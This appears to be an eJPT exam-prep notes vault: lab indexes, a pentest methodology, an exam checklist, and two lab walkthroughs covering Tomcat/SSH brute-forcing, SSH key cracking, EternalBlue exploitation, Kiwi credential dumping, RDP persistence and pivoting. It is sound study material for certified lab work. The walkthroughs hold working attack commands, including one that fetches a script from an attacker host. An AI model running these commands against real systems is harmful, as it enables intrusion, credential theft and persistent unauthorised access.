aliases: [Home, Dashboard, Index]
tags: [MOC, dashboard]

🏠 Pentest Study Vault

"The quieter you become, the more you are able to hear." - Kali Linux

🗺️ Navigation

📊 Study Stats

📈 eJPT Exam Readiness

• [ ] Reconnaissance & OSINT
• [ ] Scanning & Enumeration (Nmap, service enum)
• [ ] Exploitation (SMB, FTP, SSH, web services)
• [ ] Post-Exploitation (credential dumping, clearing tracks)
• [ ] Privilege Escalation (Linux + Windows)
• [ ] Persistence & Pivoting
• [ ] Password Attacks (John, Hashcat, Hydra)
• [ ] Shells & File Transfer
• [ ] Web Application Attacks (SQLi, XSS, LFI)
• [ ] Metasploit & Meterpreter
• [ ] Active Directory (Breach → Enumerate → Exploit → Persist)

📅 Recent Activity

Log daily study here:

📋 eJPT / INE Lab Index

Master index for all INE labs, CTFs, and TryHackMe rooms.
Use this as your central navigation hub.

📊 Stats

🧪 INE Labs

🔍 Reconnaissance (4)

Passive & active recon, banner grabbing, web crawling

• Banner Grabbing
• Passive Crawling with Burp Suite
• Target Enumeration
• Web Enumeration

🔢 Scanning Enumeration (25)

Port scanning, service enumeration, local enumeration

• Apache Enumeration
• Armitage - Port Scanning and Enumeration
• Automating Linux Local Enumeration
• Automating Windows Local Enumeration
• Directory Enumeration with Gobuster
• Enumerating Network Information Linux
• Enumerating Network Information Windows
• Enumerating Processes Cron Linux
• Enumerating Processes Services - Windows
• Enumerating System Information - Linux
• Enumerating System Information - Windows
• Enumerating Users Groups Windows
• HTTP Method Enumeration
• MySQL Enumeration (Metasploit Modules)
• Network Service Scanning (Pivot & Internal Enumeration)
• Port Scanning & Enumeration - Windows
• Port Scanning Enumeration Linux
• Postfix Recon Basics (SMTP Enumeration)
• ProFTP Recon Basics
• SNMP Analysis (Enumeration to SMB Exploitation)
• Samba Recon Basics
• Samba Recon Dictionary Attack
• Scanning Web Application with Nikto
• Vulnerability Scanning with Nmap Scripts
• Web App Vulnerability Scanning With WMAP

💥 Exploitation (35)

Gaining initial access - service exploits, web exploits, brute force

• Armitage - Exploitation and Post Exploitation
• DNS & SMB Relay Attack (MiTM Credential Relay)
• Editing Gone Wrong
• Exploiting WordPress
• Fixing Exploits #U2013 Rejetto HFS 2.3
• Java Web Server (Tomcat JSP Upload Bypass)
• Lets Go Phishing
• Memory Injection (Metasploit)
• NetBIOS Hacking (SMB Exploitation & Pivoting)
• Password Cracker (ProFTPD Backdoor)
• SSH Login
• Shellshock (CVE-2014-6271)
• Targeting Microsoft IIS FTP
• Targeting MySQL Windows
• Targeting OpenSSH Windows
• Targeting PHP Linux
• Targeting SMB Windows
• Targeting Samba Linux
• Targeting vsFTPd Linux
• Targeting_FTP_Windows_v2
• Targeting_MySQL_Windows_v1
• Targeting_PHP_Linux_v1
• Targeting_SMB_Windows_v3
• Targeting_vsFTPd_Linux_v1
• Vulnerable FTP Server (vsftpd Backdoor)
• Vulnerable File Sharing Service
• Vulnerable SMTP Server (Haraka Exploit)
• Vulnerable SSH Server (libssh Auth Bypass)
• WinRM Exploitation with Metasploit
• Windows HTTP File Server (HFS)
• Windows IIS Server DAVTest
• Windows IIS Server WebDav Metasploit
• Windows Insecure RDP Service
• Windows SMB Server PSexec
• Windows-Exploiting SMB With PsExec

🔎 Post Exploitation (8)

Info gathering after access - keylogging, credential dumping, clearing tracks

• Clearing Tracks on Windows
• Clearing Your Tracks On Linux
• Linux - Post Exploitation Lab I
• Linux - Post Exploitation Lab II
• Window-Clearing Event Logs
• Windows - Post Exploitation Modules
• Windows Meterpreter Kiwi Extension
• Windows-File and Keylogging

⬆️ Privilege Escalation (9)

Escalating from low-priv to root/SYSTEM

• Linux - Privilege Escalation
• Local Job Scheduling
• Permissions Matter - Writable etc shadow
• Privilege Escalation (Cron Jobs Gone Wild II)
• Privilege Escalation (SetUID Binary Hijacking)
• Privilege Escalation Impersonate
• UAC Bypass UACMe
• Unattended Installation
• Windows PrivescCheck

🔗 Persistence Pivoting (6)

Maintaining access, RDP, pivoting to other networks

• Linux - Establishing Persistence
• Maintaining Access - Persistence Service
• Maintaining Access - RDP
• Maintaining Access I
• Windows - Enabling Remote Desktop
• Windows - Pivoting

🔑 Password Attacks (2)

Hash cracking, credential attacks

• NTLM Hash Cracking Windows
• Password Cracker - Linux

🐚 Shells File Transfer (8)

Reverse/bind shells, netcat, file transfers, shell upgrades

• Bind Shells
• Netcat Fundamentals
• Reverse Shells
• Setting Up Web Server With Python
• Transferring Files To Linux Targets
• Transferring Files To Windows Targets
• Upgrading Command Shell to Meterpreter
• Upgrading Non-Interactive Shells

🧰 Tools Frameworks (3)

Metasploit, Meterpreter, Armitage

• Labs and Commands with comments
• Meterpreter Basics
• The Metasploit Framework

🏁 INE CTFs

• Assessment Methodologies Enumeration CTF 1
• Host and Network Penetration Testing System-Host Based Attacks CTF 1

🔴 TryHackMe Rooms

• Active Directory Basics - TryHackMe
• Authentication Bypass
• DNS Manipulation - TryHackMe
• Encryption Crypto 101 - TryHackMe
• File Inclusion
• Hashing Crypto 101 - TryHackMe
• Introductory Networking - TryHackMe
• John the Ripper Basics - TryHackMe
• Linux Privilege Escalation - TryHackMe
• Network Services 1 - TryHackMe
• Network Services 2 - TryHackMe
• Nmap - TryHackMe
• OWASP Juice Shop - TryHackMe
• OWASP Top 10 2025 Insecure Data Handling - TryHackMe
• Pickle Rick - TryHackMe
• Windows Privilege Escalation - TryHackMe

📈 eJPT Exam Readiness

• [ ] Reconnaissance & OSINT
• [ ] Scanning & Enumeration (Nmap, service enum)
• [ ] Exploitation (SMB, FTP, SSH, web services)
• [ ] Post-Exploitation (credential dumping, clearing tracks)
• [ ] Privilege Escalation (Linux + Windows)
• [ ] Persistence & Pivoting
• [ ] Password Attacks (John, Hashcat, Hydra)
• [ ] Shells & File Transfer
• [ ] Web Application Attacks
• [ ] Metasploit & Meterpreter
• [ ] CTF Practice

Tags: #ejpt #index #navigation

aliases: [Methodology, Pentest Methodology]
tags: [eJPT, methodology, MOC]

📋 Methodology Overview

🏠 Home | eJPT Study Guide MOC | eJPT Exam Checklist

The Pentest Lifecycle

Copy1. RECONNAISSANCE
   Passive: OSINT, WHOIS, Google dorking, Shodan
   Active: DNS enum, network discovery
   → Know your target before touching it

2. SCANNING & ENUMERATION
   Host discovery → Port scanning → Service enumeration
   Tools: Nmap, Gobuster, Nikto, enum4linux
   → Map the attack surface

3. VULNERABILITY ASSESSMENT
   searchsploit, Nmap vuln scripts, manual research
   Cross-reference service versions with known CVEs
   → Identify what's exploitable

4. EXPLOITATION
   Metasploit, manual exploits, brute force, web attacks
   Default creds → known exploits → brute force
   → Gain initial access

5. POST-EXPLOITATION
   Stabilize shell → enumerate locally → escalate privileges
   Dump creds → loot files → search for flags
   Tools: LinPEAS, WinPEAS, Mimikatz, hashdump
   → Maximize access

6. LATERAL MOVEMENT / PIVOTING
   Check for additional network interfaces
   Pass-the-Hash, SSH tunneling, Metasploit autoroute
   → Expand reach

7. PERSISTENCE (knowledge)
   Backdoors, scheduled tasks, SSH keys
   → Maintain access

Per-Target Workflow

Copy□ nmap -sS -sV -sC -p- -oA target_name <IP>
□ Check each open port:
  ├── HTTP/HTTPS → Browse, robots.txt, gobuster, nikto, whatweb
  ├── SMB (445)  → smbclient, enum4linux, smbmap
  ├── FTP (21)   → anonymous login, version check
  ├── SSH (22)   → version, brute force if creds found
  ├── MySQL (3306) → root:(blank), nmap scripts
  ├── RDP (3389) → note for later access
  └── Other      → banner grab, searchsploit version
□ searchsploit every service version
□ Try default/weak credentials on ALL login services
□ Exploit → Stabilize shell → Enumerate → Escalate
□ Check for additional networks → Pivot if found
□ Collect flags / answer exam questions

Decision Tree: Got a Shell

CopyLinux:
  ├── whoami / id / hostname / ip a
  ├── sudo -l → check GTFOBins
  ├── find / -perm -4000 → SUID → check GTFOBins
  ├── cat /etc/crontab → writable scripts?
  ├── Run LinPEAS
  └── cat /etc/passwd, /etc/shadow

Windows:
  ├── whoami /priv / net user / systeminfo
  ├── SeImpersonatePrivilege → Potato exploits
  ├── hashdump / kiwi → dump creds
  ├── Run WinPEAS
  └── Unquoted paths, AlwaysInstallElevated, stored creds

Decision Tree: Got Credentials

CopyFound credentials?
  ├── Try on SSH, FTP, SMB, RDP, MySQL, web logins
  ├── Try on ALL hosts (not just current target)
  ├── Try username variations (admin, root, Administrator)
  └── If hash → PtH: psexec.py, evil-winrm, xfreerdp

Decision Tree: Lateral Movement (AD)

CopyGot credentials/hashes?
  ├── Plaintext → PsExec, WinRM, RDP, sc.exe
  ├── NTLM hash → Pass-the-Hash
  ├── Kerberos ticket → Pass-the-Ticket
  └── AES key → Overpass-the-Hash

Got writable share?
  ├── Web root → Upload web shell
  ├── Scripts → Backdoor .vbs/.bat
  └── Executables → Backdoor with msfvenom

Need to bypass firewall?
  ├── SSH -L (local forward) → Bring services to pivot
  └── SSH -R (remote forward) → Push services to attacker

🔗 Related Notes

• eJPT Exam Checklist
• eJPT Study Guide MOC
• Lateral Movement and Pivoting - TryHackMe
• Blue - TryHackMe

Tags: #ejpt #methodology

aliases: [Exam Checklist]
tags: [eJPT, exam]

✅ eJPT Exam Checklist

eJPT Study Guide MOC | 📋 Methodology Overview | 🏠 Home

Before the Exam

• [ ] VPN connectivity tested (OpenVPN)
• [ ] Kali VM ready with tools updated
• [ ] Note-taking ready (Obsidian / CherryTree)
• [ ] Screenshots tool ready (Flameshot)
• [ ] Stable internet connection
• [ ] 48-hour block cleared (open-book, take breaks)

Phase 1: Network Discovery

• [ ] Connect to VPN, confirm: ip a
• [ ] Discover live hosts: nmap -sn <network>/24
• [ ] Document all discovered hosts
• [ ] Check for multiple subnets (pivoting)

Phase 2: Port Scanning

• [ ] Quick scan: nmap -sS --top-ports 1000 -T4 -oA quick <targets>
• [ ] Full scan interesting hosts: nmap -sS -p- -T4 -oA full <target>
• [ ] Deep scan found ports: nmap -sV -sC -p <ports> -oA deep <target>
• [ ] UDP top ports: nmap -sU --top-ports 50 <target>

Phase 3: Enumeration

• [ ] HTTP → browse, robots.txt, gobuster, nikto, whatweb
• [ ] SMB → smbclient -L //target -N, enum4linux -a target
• [ ] FTP → anonymous login
• [ ] SSH → note version
• [ ] MySQL → nmap --script mysql-info
• [ ] searchsploit every service version

Phase 4: Exploitation

• [ ] Default credentials first
• [ ] Exploit known vulns (Metasploit / manual)
• [ ] Brute force if needed: hydra
• [ ] Web attacks: SQLi, LFI, command injection
• [ ] Stabilize every shell

Phase 5: Post-Exploitation

• [ ] whoami, id, hostname, ip a
• [ ] Linux: sudo -l, SUID, crontab, LinPEAS
• [ ] Windows: whoami /priv, systeminfo, WinPEAS
• [ ] Dump creds → try on other hosts
• [ ] Find flags

Phase 6: Pivoting (if multi-network)

• [ ] Check additional interfaces: ip a
• [ ] Autoroute: run autoroute -s <subnet>
• [ ] SOCKS proxy → proxychains for internal scanning
• [ ] Repeat Phases 2-5 on internal hosts

Quick Reference - Default Credentials

Quick Reference - Wordlists

Copy/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Tags: #ejpt #exam #checklist

aliases: [INE Lab Index, Lab Index]
tags: [MOC, eJPT, ine]

📋 eJPT Lab Index

Master index for all INE labs, CTFs, and TryHackMe rooms.

🏠 Home | eJPT Study Guide MOC | TryHackMe MOC

📊 Stats

🧪 INE Labs

🔍 Reconnaissance (4)

• Banner Grabbing
• Passive Crawling with Burp Suite
• Target Enumeration
• Web Enumeration

🔢 Scanning & Enumeration (25)

• Apache Enumeration
• Armitage - Port Scanning and Enumeration
• Automating Linux Local Enumeration
• Automating Windows Local Enumeration
• Directory Enumeration with Gobuster
• Enumerating Network Information Linux
• Enumerating Network Information Windows
• Enumerating Processes Cron Linux
• Enumerating Processes Services - Windows
• Enumerating System Information - Linux
• Enumerating System Information - Windows
• Enumerating Users Groups Windows
• HTTP Method Enumeration
• MySQL Enumeration (Metasploit Modules)
• Network Service Scanning (Pivot & Internal Enumeration)
• Port Scanning & Enumeration - Windows
• Port Scanning Enumeration Linux
• Postfix Recon Basics (SMTP Enumeration)
• ProFTP Recon Basics
• SNMP Analysis (Enumeration to SMB Exploitation)
• Samba Recon Basics
• Samba Recon Dictionary Attack
• Scanning Web Application with Nikto
• Vulnerability Scanning with Nmap Scripts
• Web App Vulnerability Scanning With WMAP

💥 Exploitation (35)

• Armitage - Exploitation and Post Exploitation
• DNS & SMB Relay Attack (MiTM Credential Relay)
• Editing Gone Wrong
• Exploiting WordPress
• Fixing Exploits #U2013 Rejetto HFS 2.3
• Java Web Server (Tomcat JSP Upload Bypass)
• Lets Go Phishing
• Memory Injection (Metasploit)
• NetBIOS Hacking (SMB Exploitation & Pivoting)
• Password Cracker (ProFTPD Backdoor)
• SSH Login
• Shellshock (CVE-2014-6271)
• Targeting Microsoft IIS FTP
• Targeting MySQL Windows
• Targeting OpenSSH Windows
• Targeting PHP Linux
• Targeting SMB Windows
• Targeting Samba Linux
• Targeting vsFTPd Linux
• Targeting_FTP_Windows_v2
• Targeting_MySQL_Windows_v1
• Targeting_PHP_Linux_v1
• Targeting_SMB_Windows_v3
• Targeting_vsFTPd_Linux_v1
• Vulnerable FTP Server (vsftpd Backdoor)
• Vulnerable File Sharing Service
• Vulnerable SMTP Server (Haraka Exploit)
• Vulnerable SSH Server (libssh Auth Bypass)
• WinRM Exploitation with Metasploit
• Windows HTTP File Server (HFS)
• Windows IIS Server DAVTest
• Windows IIS Server WebDav Metasploit
• Windows Insecure RDP Service
• Windows SMB Server PSexec
• Windows-Exploiting SMB With PsExec

🔎 Post Exploitation (8)

• Clearing Tracks on Windows
• Clearing Your Tracks On Linux
• Linux - Post Exploitation Lab I
• Linux - Post Exploitation Lab II
• Window-Clearing Event Logs
• Windows - Post Exploitation Modules
• Windows Meterpreter Kiwi Extension
• Windows-File and Keylogging

⬆️ Privilege Escalation (9)

• Linux - Privilege Escalation
• Local Job Scheduling
• Permissions Matter - Writable etc shadow
• Privilege Escalation (Cron Jobs Gone Wild II)
• Privilege Escalation (SetUID Binary Hijacking)
• Privilege Escalation Impersonate
• UAC Bypass UACMe
• Unattended Installation
• Windows PrivescCheck

🔗 Persistence & Pivoting (6)

• Linux - Establishing Persistence
• Maintaining Access - Persistence Service
• Maintaining Access - RDP
• Maintaining Access I
• Windows - Enabling Remote Desktop
• Windows - Pivoting

🔑 Password Attacks (2)

• NTLM Hash Cracking Windows
• Password Cracker - Linux

🐚 Shells & File Transfer (8)

• Bind Shells
• Netcat Fundamentals
• Reverse Shells
• Setting Up Web Server With Python
• Transferring Files To Linux Targets
• Transferring Files To Windows Targets
• Upgrading Command Shell to Meterpreter
• Upgrading Non-Interactive Shells

🧰 Tools & Frameworks (3)

• Labs and Commands with comments
• Meterpreter Basics
• The Metasploit Framework

🏁 INE CTFs

• Assessment Methodologies Enumeration CTF 1
• Host and Network Penetration Testing System-Host Based Attacks CTF 1

Tags: #ejpt #ine #index

aliases: [eJPT MOC, eJPT Index]
tags: [MOC, eJPT]

🎯 eJPT Study Guide

INE eJPT v2 - organized by exam domain, linked to your lab writeups.

🏠 Home | TryHackMe MOC | eJPT Exam Checklist | 📋 Methodology Overview

Domain 1 - Assessment Methodologies

Recon, scanning, enumeration, vulnerability assessment.

TryHackMe Coverage

• Nmap - TryHackMe - Scan types, NSE scripts, timing, output
• Network Services 1 - TryHackMe - SMB, Telnet, FTP
• Network Services 2 - TryHackMe - NFS, SMTP, MySQL
• Introductory Networking - TryHackMe - OSI model, TCP/IP, protocols
• DNS Manipulation - TryHackMe - DNS spoofing, cache poisoning

INE Labs (25 Scanning + 4 Recon)

• Banner Grabbing | Target Enumeration | Web Enumeration | Passive Crawling with Burp Suite
• Apache Enumeration | Directory Enumeration with Gobuster | Scanning Web Application with Nikto
• Samba Recon Basics | Samba Recon Dictionary Attack | ProFTP Recon Basics
• MySQL Enumeration (Metasploit Modules) | Postfix Recon Basics (SMTP Enumeration)
• Vulnerability Scanning with Nmap Scripts | SNMP Analysis (Enumeration to SMB Exploitation)
• HTTP Method Enumeration | Web App Vulnerability Scanning With WMAP

Domain 2 - Host & Network Auditing

System/host attacks, network attacks, Metasploit.

TryHackMe Coverage

• Blue - TryHackMe - EternalBlue (MS17-010), hashdump, shell upgrading
• Steel Mountain - TryHackMe - HFS 2.3 RCE, unquoted service path privesc
• Kenobi - TryHackMe - Samba + ProFTPD + NFS chaining, SUID PATH hijack
• Alfred - TryHackMe - Jenkins RCE, token impersonation
• Metasploit Introduction - TryHackMe | Metasploit Exploitation - TryHackMe | Metasploit Meterpreter - TryHackMe

INE Labs (35 Exploitation + 3 Tools)

• Targeting SMB Windows | Windows SMB Server PSexec | Windows-Exploiting SMB With PsExec
• Targeting Samba Linux | Targeting vsFTPd Linux | Targeting MySQL Windows
• WinRM Exploitation with Metasploit | Shellshock (CVE-2014-6271)
• DNS & SMB Relay Attack (MiTM Credential Relay) | NetBIOS Hacking (SMB Exploitation & Pivoting)
• The Metasploit Framework | Meterpreter Basics | Labs and Commands with comments

Domain 3 - Host & Network Penetration Testing

Exploitation, post-exploitation, privilege escalation, pivoting, password attacks.

TryHackMe Coverage

Privilege Escalation:
- Linux Privilege Escalation - TryHackMe | Linux PrivEsc Tib3rius - TryHackMe | Common Linux Privesc - TryHackMe
- Windows Privilege Escalation - TryHackMe

Active Directory (Full Kill Chain):
- Active Directory Basics - TryHackMe → Breaching Active Directory - TryHackMe → Enumerating Active Directory - TryHackMe
- → Lateral Movement and Pivoting - TryHackMe → Exploiting Active Directory - TryHackMe → Persisting Active Directory - TryHackMe
- Credentials Harvesting - TryHackMe

Password Cracking:
- John the Ripper Basics - TryHackMe | Hashing Crypto 101 - TryHackMe | Encryption Crypto 101 - TryHackMe

INE Labs

• Post-Exploit: Linux - Post Exploitation Lab I | Windows - Post Exploitation Modules | Windows Meterpreter Kiwi Extension
• PrivEsc: Linux - Privilege Escalation | Privilege Escalation (SetUID Binary Hijacking) | Privilege Escalation Impersonate | UAC Bypass UACMe
• Persistence/Pivot: Windows - Pivoting | Linux - Establishing Persistence | Maintaining Access - Persistence Service
• Password: NTLM Hash Cracking Windows | Password Cracker - Linux
• Shells: Reverse Shells | Bind Shells | Netcat Fundamentals | Upgrading Non-Interactive Shells

Domain 4 - Web Application Penetration Testing

OWASP Top 10, SQLi, XSS, LFI/RFI, command injection.

TryHackMe Coverage

• OWASP Top 10 2025 Insecure Data Handling - TryHackMe - All OWASP categories hands-on
• OWASP Juice Shop - TryHackMe - Injection, broken auth, XSS, data exposure
• File Inclusion - LFI, RFI, PHP wrappers
• Authentication Bypass - Username enum, brute force, logic flaws
• Pickle Rick - TryHackMe - Web enum + command injection CTF
• Mr Robot CTF - TryHackMe - WordPress exploitation CTF

INE Labs

• Exploiting WordPress | Java Web Server (Tomcat JSP Upload Bypass)
• HTTP Method Enumeration | Web App Vulnerability Scanning With WMAP
• Windows IIS Server DAVTest | Windows IIS Server WebDav Metasploit

Basic Pentesting - TryHackMe

Room Link: TryHackMe - Basic Pentesting
Difficulty: 🟢 Easy
Date Started:
Date Completed:
Status: #in-progress
Source: OvergrownCarrot1 Zero to Hero eJPT Series

🎯 Objective

Enumerate a target running multiple services (SSH, SMB, HTTP, Apache Tomcat), discover credentials through file shares and brute-forcing, pivot between user accounts using SSH keys, and escalate to root. Exercises the full pentesting lifecycle from recon to root.

📝 Key Concepts Learned

• Multi-service enumeration (SMB + HTTP + Tomcat + SSH)
• Discovering usernames from SMB shares and web files
• SSH private key extraction and cracking with ssh2john + John
• Lateral movement between user accounts via SSH keys
• Privilege escalation through stored credentials and file permissions
• File transfer with Python HTTP server + LinPEAS

Phase 1: Reconnaissance & Scanning (1:00-3:57)

Setup

Copy# Create organized project directory
mkdir basic_pen_testing && cd basic_pen_testing

Nmap Scan (1:26)

Copy# Aggressive full port scan - fast, no ping, no DNS, all ports
nmap -p- -vv -n -Pn --min-rate 5000 -T5 -A -o nmap.txt <TARGET_IP>

Findings:

Service Analysis (3:13-3:57)

Copy# Check what NSE scripts are available
locate .nse

# Manual inspection of Tomcat on port 8080
curl -v http://<TARGET_IP>:8080

Phase 2: Web & SMB Enumeration (4:08-18:12)

Web Server Enumeration (4:08-5:32)

Copy# Browse to the web server manually to identify versions
firefox http://<TARGET_IP>:8080 &

# Search for Tomcat 9.0.7 exploits
searchsploit tomcat 9.0.7

Directory Brute-Forcing

Copy# dirb against the main web server (exam-compatible tool)
dirb http://<TARGET_IP>

Findings: Discovered files dev.txt and j.txt containing clues about usernames and application details.

SMB Enumeration (14:36-15:57)

Copy# Try enum4linux for user/share enumeration
enum4linux -a <TARGET_IP>

# If enum4linux fails, use smbclient directly
smbclient -L //<TARGET_IP> -N        # list shares (null session)
smbclient //<TARGET_IP>/<share> -N    # connect anonymously
ls
get <filename>

Key finding: Discovered the username jan from a text file in an SMB share.

Phase 3: Brute-Forcing Credentials (18:12-24:59)

Tomcat Manager Brute-Force (20:04-21:49)

Copymsfconsole

# Brute-force Tomcat manager login page
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS <TARGET_IP>
set RPORT 8080
run

SSH Login with Discovered Username (24:59)

Copy# Login as jan with discovered/cracked password
ssh jan@<TARGET_IP>

Phase 4: Lateral Movement - SSH Key Exploitation (25:07-30:31)

Enumeration as User jan (25:15-28:27)

Copy# Check sudo permissions
sudo -l
# Result: jan has limited or no sudo access

# Look for other users
ls /home/
# Found: jan, kay (or 'k')

# Check other user's home directory for SSH keys
ls -la /home/kay/.ssh/
# Found: id_rsa (private key!)

Extracting and Cracking the SSH Key (29:21-30:12)

Copy# Copy the private key to your attack machine
cat /home/kay/.ssh/id_rsa
# Copy the output, save to a local file called id_rsa

# Set secure permissions (SSH requires this)
chmod 600 id_rsa

# Convert the SSH key to a crackable hash format
ssh2john id_rsa > hash.txt

# Crack the key passphrase with John
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --fork=4

Login as Kay (30:31)

Copy# SSH using the cracked private key
ssh -i id_rsa kay@<TARGET_IP>
# Enter the cracked passphrase when prompted

Phase 5: Privilege Escalation (30:35-41:03)

Manual Enumeration (30:35-34:03)

Copy# Check sudo permissions for kay
sudo -l

# Search for stored credentials
cat ~/.bash_history
cat /opt/tomcat/conf/tomcat-users.xml
ls -la /var/www/
find / -name "*.conf" -readable 2>/dev/null
find / -name "*.txt" -readable 2>/dev/null

# Check SUID binaries
find / -perm -u=s -type f 2>/dev/null

# Check for writable sensitive files
find / -not -type l -perm -o+w 2>/dev/null

Automated Enumeration with LinPEAS (42:04-43:37)

Copy# On your attack machine - host LinPEAS
python3 -m http.server 80

# On the target - download and run
wget http://<ATTACKER_IP>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

🧠 Lessons & Takeaways

Attack Chain Summary

CopyNmap → Ports 22, 80, 139/445, 8080
│
├─ SMB Enumeration
│    smbclient → anonymous access → text files → username "jan"
│
├─ Web Enumeration
│    dirb → found dev.txt, j.txt → more username clues
│    searchsploit tomcat 9.0.7 → Ghostcat (backup plan)
│
├─ Brute-Force
│    MSF tomcat_mgr_login → Tomcat manager creds
│    Hydra/discovered password → SSH as jan
│
├─ Lateral Movement
│    jan → ls /home/kay/.ssh/ → found id_rsa
│    ssh2john + John → cracked key passphrase
│    ssh -i id_rsa kay@target → logged in as kay
│
├─ Privilege Escalation
│    Manual enum → stored creds / sudo / SUID / bash_history
│    LinPEAS for automated enumeration
│    → ROOT
│
└─ Post-Exploitation
     Explored Tomcat config, filesystem, other potential pivots

Cheat Card

Key Takeaways

• Enumerate in parallel - run dirb in one terminal while checking SMB in another. Don't wait for tools to finish before moving on
• Read every file you find - text files in SMB shares, web directories, and home folders often contain usernames and passwords
• Check all users' .ssh/ directories - readable private keys mean free lateral movement
• ssh2john + John cracks SSH key passphrases - memorize this workflow: extract key → ssh2john → John with rockyou → ssh -i
• .bash_history is a goldmine - commands typed by other users may contain passwords, internal IPs, or service credentials
• Exam environment has no internet - exploits that require downloading code from the internet won't work. Use what's already on the Kali instance or transfer tools via Python HTTP server
• --min-rate 5000 + -T5 is the fastest Nmap combo - on the exam, speed matters more than stealth

🔗 Related Notes

• Zero-to-Hero-eJPT-v2-Exam-Simulation
• Zero-to-Hero-Part1-Metasploit-EternalBlue-Pivoting
• 02-Host-Network-Penetration-Testing
• 03-Post-Exploitation
• CheatSheets/Password Attacks Cheat Sheet

Tags: #tryhackme #basic-pentesting #smb #ssh #tomcat #ssh2john #lateral-movement #privesc #ejpt #completed

Zero to Hero eJPT: Part 1 - Meterpreter, Metasploit, IP Route & EternalBlue

Source: OvergrownCarrot1 (Ryan Yager) - Zero to Hero eJPT Playlist (Part 1 of 4)
Video: YouTube
Focus: EternalBlue exploitation, Meterpreter post-exploitation, credential dumping, pivoting with autoroute

🎯 Key Exam Insight

📌 Video Timestamp Reference

Phase 1: Enumeration & Vulnerability Assessment

Initial Service Scan (5:48)

Copy# Service and OS detection - identify what's running
nmap -sV -O <TARGET_IP>

# Focused SMB scan with default scripts (5:48)
nmap -sV -sC -p 445 <TARGET_IP>

EternalBlue Vulnerability Check (6:44)

Copy# Specific MS17-010 (EternalBlue) check (6:44)
nmap --script=ms17-010 -p 445 <TARGET_IP>

# Broader vulnerability category scan (7:44)
nmap --script "vuln" -p 445 <TARGET_IP>

SMB Share Enumeration (15:19)

Copy# List available SMB shares
smbclient -L \\\\<TARGET_IP>\\

Nessus Scanning (13:50)

Use case: Nessus automates vulnerability scanning and generates comprehensive reports. It catches vulnerabilities that manual Nmap scripts might miss - especially useful for identifying multiple attack vectors across a network.

On the eJPT exam, you may not have Nessus, but understanding its output and how it maps to Metasploit modules is tested conceptually. In MSF, you can import Nessus results:
bash > db_import /path/to/nessus_results.nessus > vulns # view imported vulnerabilities >

Phase 2: Exploitation with EternalBlue (18:12)

Configuring the Exploit

Copymsfconsole -q
search eternalblue

# Select the exploit module
use exploit/windows/smb/ms17_010_eternalblue

# Configure required options
set RHOSTS <TARGET_IP>          # target machine
set LHOST <YOUR_IP>             # your attack machine (for reverse connection)
set PAYLOAD windows/x64/meterpreter/reverse_tcp    # Meterpreter payload

# Verify configuration
show options

# Execute
run

Result (19:30)

A Meterpreter session opens, giving you a full command-line interface on the target machine with the highest possible privileges.

Phase 3: Post-Exploitation (19:40)

Credential Dumping with Kiwi (19:43)

Why do this? Even with SYSTEM access, you need plaintext passwords and hashes for lateral movement - logging into other machines on the network via SSH, RDP, SMB, or pass-the-hash.

Copy# Load Kiwi (Metasploit's built-in Mimikatz) (19:46)
load kiwi

# Dump NTLM hashes from SAM database (20:00)
hashdump

# Dump ALL credentials - cleartext passwords + hashes from memory (23:37)
creds_all

# Dump SAM database (local account hashes)
lsa_dump_sam

# Dump LSA secrets (service account passwords, cached creds)
lsa_dump_secrets

# Live view of target desktop - useful for seeing what user is doing (23:53)
screenshare

RDP Persistence (28:20)

Use case: Create a new admin user and enable RDP for persistent GUI access - even if your Meterpreter session dies, you can RDP back in.

Copy# Enable RDP + create a new admin user in one command
run getgui -e -u <username> -p <password>
# -e = enable RDP
# -u = new username
# -p = new password
# This also adds the user to the local administrators group

Cracking NTLM Hashes (38:50)

Copy# Save hashes to a file (format: username:RID:LM_hash:NTLM_hash:::)
# Copy the hashdump output into hash.txt on your attack machine

# Crack with John the Ripper
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

# View cracked passwords
john --format=nt hash.txt --show

Process Migration for Stability (40:40)

Why migrate? If the process you exploited terminates (e.g., the user closes a browser), your Meterpreter session dies. Migrating to a stable system process like spoolsv.exe or lsass.exe keeps your session alive.

Copy# Migrate to a stable system process by name
migrate -N spoolsv.exe

# Alternative: migrate to a specific PID
ps                          # list processes
migrate <PID>

# Other good migration targets:
# spoolsv.exe  - Print Spooler (always running)
# lsass.exe    - Local Security Authority (always running, needed for kiwi)
# explorer.exe - Windows Explorer (stable, but user-level)

Privilege Escalation (44:50)

Copy# Check current user
getuid

# Attempt automatic privilege escalation
getsystem

# If getsystem fails, check what you have
getprivs

# Look for SeImpersonatePrivilege - if present, use PrintSpoofer or Potato exploits

Phase 4: Pivoting - Navigating the Network (55:00)

Adding Routes with Autoroute (56:16)

Copy# From your Meterpreter session - check what networks the target can reach
ipconfig                    # look for multiple interfaces/subnets

# Add a route to the internal network through the compromised host (56:16)
run autoroute -s <INTERNAL_SUBNET>/CIDR

# Example: target has 10.10.10.0/24 on a second interface
run autoroute -s 10.10.10.0/24

# Verify routes
run autoroute -p

# Alternative syntax:
run post/multi/manage/autoroute

Manual Linux Route - For Tools Outside Metasploit (58:25)

Copy# Add a route on your Kali machine to reach the internal network via the compromised host
sudo ip route add <INTERNAL_NETWORK>/24 via <GATEWAY_IP>

# Example: internal network 10.10.10.0/24, gateway is the compromised host at 192.168.1.5
sudo ip route add 10.10.10.0/24 via 192.168.1.5

Copy# Background the Meterpreter session
background

# Start a SOCKS proxy
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVPORT 9050
run

# In a new terminal - use proxychains to route external tools
proxychains nmap -sT -Pn -sV <INTERNAL_TARGET>
proxychains curl http://<INTERNAL_TARGET>

Pivoting Workflow Summary

Copy1. Exploit Target1 (external-facing machine)
2. ipconfig → discover internal subnet on Target1
3. run autoroute -s <internal_subnet>/CIDR
4. Scan internal network:
   - MSF modules work directly (portscan, smb_login, etc.)
   - External tools need SOCKS proxy + proxychains
5. Port forward specific services:
   portfwd add -l <LOCAL_PORT> -p <TARGET_PORT> -r <INTERNAL_IP>
6. Exploit Target2 through the pivot
   - Use bind_tcp payloads (not reverse_tcp) for pivoted targets

🧠 Key Takeaways

Exam Methodology from This Video

CopyEnumerate → Vulnerability Scan → Exploit → Dump Creds → Pivot → Repeat
